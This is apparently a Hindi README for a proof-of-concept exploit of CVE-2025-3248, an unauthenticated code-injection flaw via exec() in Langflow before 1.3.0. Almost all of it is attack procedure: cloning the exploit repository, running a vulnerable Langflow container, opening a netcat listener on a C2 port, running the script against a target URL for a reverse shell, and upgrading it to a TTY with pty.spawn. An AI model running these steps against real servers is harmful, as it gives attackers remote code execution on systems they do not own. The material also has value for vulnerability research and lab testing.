
Langflow संस्करण <1.3.0 में RCE प्राप्त करने के लिए PoC
1.3.0 से पहले के Langflow संस्करण /api/v1/validate/code एंडपॉइंट में Python exec() फ़ंक्शन के माध्यम से बिना प्रमाणीकरण के कोड इंजेक्शन के प्रति संवेदनशील हैं। यह एक्सप्लॉइट इस कमज़ोरी का दुरुपयोग करके एक रिवर्स शेल कनेक्शन स्थापित करता है।
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4
# Terminal 1
nc -nvlp <C2_PORT>
# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>
उदाहरण: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337
नोट: शेल को TTY में अपग्रेड करने के लिए, शेल मिलने के बाद नीचे दिया गया कमांड चलाएँ।
python -c 'import pty; pty.spawn("/bin/bash")'
